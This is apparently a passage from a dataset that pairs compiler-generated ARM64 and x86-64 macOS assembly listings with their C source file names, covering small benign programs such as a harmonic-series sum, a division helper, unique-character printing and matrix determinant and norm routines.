sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
movi d0, #0000000000000000
str s0, [sp, #16]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #8
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
mov w8, #1
stur w8, [x29, #-12]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldr s0, [sp, #16]
ldur s1, [x29, #-12]
scvtf s2, s1
fmov s1, #1.00000000
fdiv s1, s1, s2
fadd s0, s0, s1
str s0, [sp, #16]
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB0_1
LBB0_4:
ldur w8, [x29, #-8]
; implicit-def: $x9
mov x9, x8
ldr s0, [sp, #16]
fcvt d0, s0
mov x8, sp
str x9, [x8]
str d0, [x8, #8]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Enter the number of terms to be added: "
l_.str.1: ; @.str.1
.asciz "%d"
l_.str.2: ; @.str.2
.asciz "The sum of %d terms is %.2f\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal4,4byte_literals
.p2align 2 ## -- Begin function main
LCPI0_0:
.long 0x3f800000 ## float 1
.section __TEXT,__text,regular,pure_instructions
.globl _main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
xorps %xmm0, %xmm0
movss %xmm0, -16(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.1(%rip), %rdi
leaq -8(%rbp), %rsi
movb $0, %al
callq _scanf
movl $1, -12(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movl -12(%rbp), %eax
cmpl -8(%rbp), %eax
jg LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movss -16(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtsi2ssl -12(%rbp), %xmm2
movss LCPI0_0(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero
divss %xmm2, %xmm1
addss %xmm1, %xmm0
movss %xmm0, -16(%rbp)
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB0_1
LBB0_4:
movl -8(%rbp), %esi
movss -16(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
leaq L_.str.2(%rip), %rdi
movb $1, %al
callq _printf
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Enter the number of terms to be added: "
L_.str.1: ## @.str.1
.asciz "%d"
L_.str.2: ## @.str.2
.asciz "The sum of %d terms is %.2f\n"
.subsections_via_symbols
| the_stack_data/95450103.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _call_me ; -- Begin function call_me
.p2align 2
_call_me: ; @call_me
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
stur w1, [x29, #-8]
ldur w8, [x29, #-8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
mov w8, #4
stur w8, [x29, #-12]
b LBB0_3
LBB0_2:
ldur w8, [x29, #-4]
ldur w9, [x29, #-8]
sdiv w8, w8, w9
stur w8, [x29, #-12]
b LBB0_3
LBB0_3:
ldur w9, [x29, #-12]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp, #12] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
stur w0, [x29, #-8]
str x1, [sp, #16]
mov w0, #10
str w0, [sp, #8] ; 4-byte Folded Spill
mov w1, #2
bl _call_me
ldr w0, [sp, #8] ; 4-byte Folded Reload
ldr w1, [sp, #12] ; 4-byte Folded Reload
bl _call_me
ldr w0, [sp, #12] ; 4-byte Folded Reload
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Value %d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _call_me ## -- Begin function call_me
.p2align 4, 0x90
_call_me: ## @call_me
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
cmpl $0, -8(%rbp)
jne LBB0_2
## %bb.1:
movl $4, -12(%rbp)
jmp LBB0_3
LBB0_2:
movl -4(%rbp), %eax
cltd
idivl -8(%rbp)
movl %eax, -12(%rbp)
LBB0_3:
movl -12(%rbp), %esi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
movl $10, %edi
movl $2, %esi
callq _call_me
movl $10, %edi
xorl %esi, %esi
callq _call_me
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Value %d\n"
.subsections_via_symbols
| the_stack_data/42185.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #24]
strb wzr, [sp, #19]
str wzr, [sp, #20]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #20]
subs w8, w8, #10
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldrsw x9, [sp, #20]
sub x8, x29, #18
add x8, x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #20]
add w8, w8, #1
str w8, [sp, #20]
b LBB0_1
LBB0_4:
str wzr, [sp, #20]
b LBB0_5
LBB0_5: ; =>This Loop Header: Depth=1
; Child Loop BB0_7 Depth 2
ldr w8, [sp, #20]
subs w8, w8, #10
cset w8, ge
tbnz w8, #0, LBB0_18
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=1
strb wzr, [sp, #19]
str wzr, [sp, #12]
b LBB0_7
LBB0_7: ; Parent Loop BB0_5 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #12]
subs w8, w8, #10
cset w8, ge
tbnz w8, #0, LBB0_14
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_7 Depth=2
ldr w8, [sp, #12]
ldr w9, [sp, #20]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB0_10
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_7 Depth=2
b LBB0_13
LBB0_10: ; in Loop: Header=BB0_7 Depth=2
ldrsw x8, [sp, #12]
sub x9, x29, #18
ldrsb w8, [x9, x8]
ldrsw x10, [sp, #20]
ldrsb w9, [x9, x10]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB0_12
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_7 Depth=2
mov w8, #1
strb w8, [sp, #19]
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_7 Depth=2
b LBB0_13
LBB0_13: ; in Loop: Header=BB0_7 Depth=2
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB0_7
LBB0_14: ; in Loop: Header=BB0_5 Depth=1
ldrb w8, [sp, #19]
ands w8, w8, #0x1
cset w8, ne
tbnz w8, #0, LBB0_16
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_5 Depth=1
ldrsw x9, [sp, #20]
sub x8, x29, #18
ldrsb w10, [x8, x9]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_16
LBB0_16: ; in Loop: Header=BB0_5 Depth=1
b LBB0_17
LBB0_17: ; in Loop: Header=BB0_5 Depth=1
ldr w8, [sp, #20]
add w8, w8, #1
str w8, [sp, #20]
b LBB0_5
LBB0_18:
mov w0, #10
bl _putchar
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_20
b LBB0_19
LBB0_19:
bl ___stack_chk_fail
LBB0_20:
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%c"
l_.str.1: ; @.str.1
.asciz " %c"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -24(%rbp)
movb $0, -29(%rbp)
movl $0, -28(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
cmpl $10, -28(%rbp)
jge LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movslq -28(%rbp), %rax
leaq -18(%rbp), %rsi
addq %rax, %rsi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _scanf
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB0_1
LBB0_4:
movl $0, -28(%rbp)
LBB0_5: ## =>This Loop Header: Depth=1
## Child Loop BB0_7 Depth 2
cmpl $10, -28(%rbp)
jge LBB0_18
## %bb.6: ## in Loop: Header=BB0_5 Depth=1
movb $0, -29(%rbp)
movl $0, -36(%rbp)
LBB0_7: ## Parent Loop BB0_5 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $10, -36(%rbp)
jge LBB0_14
## %bb.8: ## in Loop: Header=BB0_7 Depth=2
movl -36(%rbp), %eax
cmpl -28(%rbp), %eax
jne LBB0_10
## %bb.9: ## in Loop: Header=BB0_7 Depth=2
jmp LBB0_13
LBB0_10: ## in Loop: Header=BB0_7 Depth=2
movslq -36(%rbp), %rax
movsbl -18(%rbp,%rax), %eax
movslq -28(%rbp), %rcx
movsbl -18(%rbp,%rcx), %ecx
cmpl %ecx, %eax
jne LBB0_12
## %bb.11: ## in Loop: Header=BB0_7 Depth=2
movb $1, -29(%rbp)
LBB0_12: ## in Loop: Header=BB0_7 Depth=2
jmp LBB0_13
LBB0_13: ## in Loop: Header=BB0_7 Depth=2
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB0_7
LBB0_14: ## in Loop: Header=BB0_5 Depth=1
movb -29(%rbp), %al
andb $1, %al
movzbl %al, %eax
cmpl $0, %eax
jne LBB0_16
## %bb.15: ## in Loop: Header=BB0_5 Depth=1
movslq -28(%rbp), %rax
movsbl -18(%rbp,%rax), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
LBB0_16: ## in Loop: Header=BB0_5 Depth=1
jmp LBB0_17
LBB0_17: ## in Loop: Header=BB0_5 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB0_5
LBB0_18:
movl $10, %edi
callq _putchar
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_20
## %bb.19:
xorl %eax, %eax
addq $48, %rsp
popq %rbp
retq
LBB0_20:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%c"
L_.str.1: ## @.str.1
.asciz " %c"
.subsections_via_symbols
| the_stack_data/61074960.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _GetDet ; -- Begin function GetDet
.p2align 2
_GetDet: ; @GetDet
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
str x0, [sp, #48]
str w1, [sp, #44]
movi d0, #0000000000000000
str d0, [sp, #24]
ldr w8, [sp, #44]
subs w8, w8, #2
cset w8, ne
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldr x8, [sp, #48]
ldr d0, [x8]
ldr x8, [sp, #48]
ldr d1, [x8, #24]
ldr x8, [sp, #48]
ldr d2, [x8, #8]
ldr x8, [sp, #48]
ldr d3, [x8, #16]
fmul d2, d2, d3
fnmsub d0, d0, d1, d2
str d0, [sp, #56]
b LBB0_25
LBB0_2:
str wzr, [sp, #40]
b LBB0_3
LBB0_3: ; =>This Loop Header: Depth=1
; Child Loop BB0_5 Depth 2
ldr w8, [sp, #40]
ldr w9, [sp, #44]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_13
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=1
fmov d0, #1.00000000
str d0, [sp, #16]
ldr w8, [sp, #40]
str w8, [sp, #32]
str wzr, [sp, #36]
b LBB0_5
LBB0_5: ; Parent Loop BB0_3 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #36]
ldr w9, [sp, #44]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_11
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=2
ldr x8, [sp, #48]
ldr w9, [sp, #36]
ldr w10, [sp, #44]
mul w9, w9, w10
ldr w10, [sp, #32]
add w9, w9, w10
ldr d1, [x8, w9, sxtw #3]
ldr d0, [sp, #16]
fmul d0, d0, d1
str d0, [sp, #16]
ldr w8, [sp, #32]
ldr w9, [sp, #44]
subs w9, w9, #1
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_5 Depth=2
mov w8, #0
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB0_9
LBB0_8: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp, #12] ; 4-byte Folded Reload
str w8, [sp, #32]
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp, #36]
add w8, w8, #1
str w8, [sp, #36]
b LBB0_5
LBB0_11: ; in Loop: Header=BB0_3 Depth=1
ldr d1, [sp, #16]
ldr d0, [sp, #24]
fadd d0, d0, d1
str d0, [sp, #24]
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_3 Depth=1
ldr w8, [sp, #40]
add w8, w8, #1
str w8, [sp, #40]
b LBB0_3
LBB0_13:
str wzr, [sp, #40]
b LBB0_14
LBB0_14: ; =>This Loop Header: Depth=1
; Child Loop BB0_16 Depth 2
ldr w8, [sp, #40]
ldr w9, [sp, #44]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_24
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_14 Depth=1
fmov d0, #1.00000000
str d0, [sp, #16]
ldr w8, [sp, #40]
str w8, [sp, #32]
str wzr, [sp, #36]
b LBB0_16
LBB0_16: ; Parent Loop BB0_14 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #36]
ldr w9, [sp, #44]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_22
b LBB0_17
LBB0_17: ; in Loop: Header=BB0_16 Depth=2
ldr x8, [sp, #48]
ldr w9, [sp, #36]
ldr w10, [sp, #44]
mul w9, w9, w10
ldr w10, [sp, #32]
add w9, w9, w10
ldr d1, [x8, w9, sxtw #3]
ldr d0, [sp, #16]
fmul d0, d0, d1
str d0, [sp, #16]
ldr w8, [sp, #32]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_19
b LBB0_18
LBB0_18: ; in Loop: Header=BB0_16 Depth=2
ldr w8, [sp, #44]
subs w8, w8, #1
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB0_20
LBB0_19: ; in Loop: Header=BB0_16 Depth=2
ldr w8, [sp, #32]
subs w8, w8, #1
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB0_20
LBB0_20: ; in Loop: Header=BB0_16 Depth=2
ldr w8, [sp, #8] ; 4-byte Folded Reload
str w8, [sp, #32]
b LBB0_21
LBB0_21: ; in Loop: Header=BB0_16 Depth=2
ldr w8, [sp, #36]
add w8, w8, #1
str w8, [sp, #36]
b LBB0_16
LBB0_22: ; in Loop: Header=BB0_14 Depth=1
ldr d1, [sp, #16]
ldr d0, [sp, #24]
fsub d0, d0, d1
str d0, [sp, #24]
b LBB0_23
LBB0_23: ; in Loop: Header=BB0_14 Depth=1
ldr w8, [sp, #40]
add w8, w8, #1
str w8, [sp, #40]
b LBB0_14
LBB0_24:
ldr d0, [sp, #24]
str d0, [sp, #56]
b LBB0_25
LBB0_25:
ldr d0, [sp, #56]
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _NormMatrix ; -- Begin function NormMatrix
.p2align 2
_NormMatrix: ; @NormMatrix
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
str x0, [sp, #40]
str w1, [sp, #36]
movi d0, #0000000000000000
str d0, [sp, #16]
str d0, [sp, #8]
str wzr, [sp, #32]
b LBB1_1
LBB1_1: ; =>This Loop Header: Depth=1
; Child Loop BB1_3 Depth 2
ldr w8, [sp, #32]
ldr w9, [sp, #36]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_8
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
str wzr, [sp, #28]
b LBB1_3
LBB1_3: ; Parent Loop BB1_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #28]
ldr w9, [sp, #36]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_6
b LBB1_4
LBB1_4: ; in Loop: Header=BB1_3 Depth=2
ldr x8, [sp, #40]
ldr w9, [sp, #32]
ldr w10, [sp, #36]
mul w9, w9, w10
ldr w10, [sp, #28]
add w9, w9, w10
ldr d0, [x8, w9, sxtw #3]
ldr x8, [sp, #40]
ldr w9, [sp, #32]
ldr w10, [sp, #36]
mul w9, w9, w10
ldr w10, [sp, #28]
add w9, w9, w10
ldr d1, [x8, w9, sxtw #3]
ldr d2, [sp, #8]
fmadd d0, d0, d1, d2
str d0, [sp, #8]
b LBB1_5
LBB1_5: ; in Loop: Header=BB1_3 Depth=2
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB1_3
LBB1_6: ; in Loop: Header=BB1_1 Depth=1
b LBB1_7
LBB1_7: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB1_1
LBB1_8:
ldr d0, [sp, #8]
fsqrt d0, d0
str d0, [sp, #16]
ldr d0, [sp, #16]
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _PrintVector ; -- Begin function PrintVector
.p2align 2
_PrintVector: ; @PrintVector
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
str w2, [sp, #12]
str wzr, [sp, #8]
b LBB2_1
LBB2_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #8]
ldr w9, [sp, #12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB2_4
b LBB2_2
LBB2_2: ; in Loop: Header=BB2_1 Depth=1
ldur x0, [x29, #-8]
ldr x8, [sp, #16]
ldrsw x9, [sp, #8]
ldr d0, [x8, x9, lsl #3]
mov x8, sp
str d0, [x8]
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
bl _fprintf
b LBB2_3
LBB2_3: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB2_1
LBB2_4:
ldur x0, [x29, #-8]
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _fprintf
ldur x0, [x29, #-8]
mov x1, #0
mov w2, #0
bl _fseek
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _CreateMatrix ; -- Begin function CreateMatrix
.p2align 2
_CreateMatrix: ; @CreateMatrix
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
str wzr, [sp, #16]
ldursw x9, [x29, #-4]
mov x8, #8
mul x8, x8, x9
ldursw x9, [x29, #-4]
mul x0, x8, x9
bl _malloc
str x0, [sp, #8]
stur wzr, [x29, #-8]
b LBB3_1
LBB3_1: ; =>This Loop Header: Depth=1
; Child Loop BB3_3 Depth 2
; Child Loop BB3_6 Depth 2
; Child Loop BB3_9 Depth 3
ldur w8, [x29, #-8]
ldur w9, [x29, #-4]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_18
b LBB3_2
LBB3_2: ; in Loop: Header=BB3_1 Depth=1
b LBB3_3
LBB3_3: ; Parent Loop BB3_1 Depth=1
; => This Inner Loop Header: Depth=2
bl _rand
mov w9, #10
sdiv w8, w0, w9
mul w8, w8, w9
subs w8, w0, w8
str w8, [sp, #16]
subs w8, w8, #1
cset w8, gt
tbnz w8, #0, LBB3_5
b LBB3_4
LBB3_4: ; in Loop: Header=BB3_3 Depth=2
b LBB3_3
LBB3_5: ; in Loop: Header=BB3_1 Depth=1
ldr s1, [sp, #16]
; implicit-def: $d0
fmov s0, s1
sshll.2d v0, v0, #0
; kill: def $d0 killed $d0 killed $q0
scvtf d0, d0
ldr x8, [sp, #8]
ldur w9, [x29, #-8]
ldur w10, [x29, #-4]
mul w9, w9, w10
ldur w10, [x29, #-8]
add w9, w9, w10
str d0, [x8, w9, sxtw #3]
stur wzr, [x29, #-12]
b LBB3_6
LBB3_6: ; Parent Loop BB3_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB3_9 Depth 3
ldur w8, [x29, #-12]
ldur w9, [x29, #-4]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_16
b LBB3_7
LBB3_7: ; in Loop: Header=BB3_6 Depth=2
ldur w8, [x29, #-12]
ldur w9, [x29, #-8]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB3_14
b LBB3_8
LBB3_8: ; in Loop: Header=BB3_6 Depth=2
b LBB3_9
LBB3_9: ; Parent Loop BB3_1 Depth=1
; Parent Loop BB3_6 Depth=2
; => This Inner Loop Header: Depth=3
bl _rand
mov w9, #10
sdiv w8, w0, w9
mul w8, w8, w9
subs w8, w0, w8
str w8, [sp, #16]
subs w8, w8, #0
cset w8, eq
mov w9, #1
str w9, [sp, #4] ; 4-byte Folded Spill
tbnz w8, #0, LBB3_11
b LBB3_10
LBB3_10: ; in Loop: Header=BB3_9 Depth=3
ldr s1, [sp, #16]
; implicit-def: $d0
fmov s0, s1
sshll.2d v0, v0, #0
; kill: def $d0 killed $d0 killed $q0
scvtf d0, d0
ldr x8, [sp, #8]
ldur w9, [x29, #-8]
ldur w10, [x29, #-4]
mul w9, w9, w10
ldur w10, [x29, #-8]
add w9, w9, w10
ldr d1, [x8, w9, sxtw #3]
fcmp d0, d1
cset w8, ge
str w8, [sp, #4] ; 4-byte Folded Spill
b LBB3_11
LBB3_11: ; in Loop: Header=BB3_9 Depth=3
ldr w8, [sp, #4] ; 4-byte Folded Reload
tbz w8, #0, LBB3_13
b LBB3_12
LBB3_12: ; in Loop: Header=BB3_9 Depth=3
b LBB3_9
LBB3_13: ; in Loop: Header=BB3_6 Depth=2
ldr s1, [sp, #16]
; implicit-def: $d0
fmov s0, s1
sshll.2d v0, v0, #0
; kill: def $d0 killed $d0 killed $q0
scvtf d0, d0
fmov d1, #10.00000000
fdiv d0, d0, d1
ldr x8, [sp, #8]
ldur w9, [x29, #-8]
ldur w10, [x29, #-4]
mul w9, w9, w10
ldur w10, [x29, #-12]
add w9, w9, w10
str d0, [x8, w9, sxtw #3]
b LBB3_14
LBB3_14: ; in Loop: Header=BB3_6 Depth=2
b LBB3_15
LBB3_15: ; in Loop: Header=BB3_6 Depth=2
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB3_6
LBB3_16: ; in Loop: Header=BB3_1 Depth=1
b LBB3_17
LBB3_17: ; in Loop: Header=BB3_1 Depth=1
ldur w8, [x29, #-8]
add w8, w8, #1
stur w8, [x29, #-8]
b LBB3_1
LBB3_18:
ldr x0, [sp, #8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _ReadMatrix ; -- Begin function ReadMatrix
.p2align 2
_ReadMatrix: ; @ReadMatrix
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
mov x0, #1152
bl _malloc
str x0, [sp, #8]
stur wzr, [x29, #-12]
b LBB4_1
LBB4_1: ; =>This Loop Header: Depth=1
; Child Loop BB4_3 Depth 2
ldur w8, [x29, #-12]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB4_8
b LBB4_2
LBB4_2: ; in Loop: Header=BB4_1 Depth=1
str wzr, [sp, #16]
b LBB4_3
LBB4_3: ; Parent Loop BB4_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #16]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB4_6
b LBB4_4
LBB4_4: ; in Loop: Header=BB4_3 Depth=2
ldur x0, [x29, #-8]
ldr x8, [sp, #8]
ldur w9, [x29, #-12]
mov w10, #12
mul w9, w9, w10
ldr w10, [sp, #16]
add w9, w9, w10
add x8, x8, w9, sxtw #3
mov x9, sp
str x8, [x9]
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
bl _fscanf
b LBB4_5
LBB4_5: ; in Loop: Header=BB4_3 Depth=2
ldr w8, [sp, #16]
add w8, w8, #1
str w8, [sp, #16]
b LBB4_3
LBB4_6: ; in Loop: Header=BB4_1 Depth=1
b LBB4_7
LBB4_7: ; in Loop: Header=BB4_1 Depth=1
